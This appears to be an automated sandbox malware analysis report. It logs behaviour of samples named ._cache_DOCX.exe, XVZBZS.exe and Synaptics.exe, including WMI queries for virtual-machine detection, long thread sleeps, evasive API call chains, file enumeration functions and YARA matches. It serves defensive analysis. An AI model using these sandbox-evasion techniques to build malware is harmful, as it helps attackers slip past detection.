Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

Queries memory information (via WMI often done to detect virtual machines)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory WHERE Tag='Physical Memory 0'

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_DiskDrive WHERE DeviceID LIKE '%PHYSICALDRIVE0%'

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory WHERE Tag='Physical Memory 0'

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3997	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4505	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4891	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 354	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6672	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3017	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5599
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4126
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7382
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2190
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6854
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2801
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7976
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1655
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6879
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2782
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Window / User API: threadDelayed 3484
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Window / User API: foregroundWindowGot 1164

Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

Source: C:\Users\user\Desktop\._cache_DOCX.exe	API coverage: 7.6 %
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	API coverage: 3.8 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7520	Thread sleep count: 3997 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7452	Thread sleep count: 4505 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1436	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7448	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6944	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1256	Thread sleep count: 4891 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6448	Thread sleep count: 354 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6092	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6700	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6072	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\timeout.exe TID: 4008	Thread sleep count: 114 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9120	Thread sleep count: 6672 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9116	Thread sleep count: 3017 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9152	Thread sleep time: -13835058055282155s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4948	Thread sleep count: 5599 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3332	Thread sleep count: 4126 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1844	Thread sleep time: -12912720851596678s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5952	Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3128	Thread sleep count: 6854 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8984	Thread sleep count: 2801 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9004	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\timeout.exe TID: 9028	Thread sleep count: 130 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3996	Thread sleep count: 7976 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3964	Thread sleep count: 1655 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4672	Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4800	Thread sleep count: 6879 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4800	Thread sleep count: 2782 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4124	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Users\user\Desktop\._cache_DOCX.exe TID: 7728	Thread sleep time: -34840s >= -30000s
Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 5400	Thread sleep time: -960000s >= -30000s
Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 4200	Thread sleep time: -60000s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystemProduct

Source: C:\Users\user\Desktop\._cache_DOCX.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\._cache_DOCX.exe

Thread sleep count: Count: 3484 delay: -10

Source: Yara match	File source: 00000037.00000002.2539046765.0000000003020000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000037.00000002.2537729882.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000037.00000002.2537729882.0000000002E88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wscript.exe PID: 2220, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\TGWEKK.vbs, type: DROPPED

Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006ADD92 GetFileAttributesW,FindFirstFileW,FindClose,	46_2_006ADD92
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006E2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	46_2_006E2044
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006E219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	46_2_006E219F
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006E24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	46_2_006E24A9
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006D6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	46_2_006D6B3F
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006D6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	46_2_006D6E4A
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006DF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	46_2_006DF350
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006DFD47 FindFirstFileW,FindClose,	46_2_006DFD47
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006DFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	46_2_006DFDD2
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_00452044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	60_2_00452044
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_0045219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	60_2_0045219F
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_004524A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	60_2_004524A9
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_00446B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	60_2_00446B3F
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_00446E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	60_2_00446E4A
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_0044F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	60_2_0044F350
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_0044FD47 FindFirstFileW,FindClose,	60_2_0044FD47
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_0044FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	60_2_0044FDD2
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_0041DD92 GetFileAttributesW,FindFirstFileW,FindClose,	60_2_0041DD92

Source: C:\Users\user\Desktop\._cache_DOCX.exe

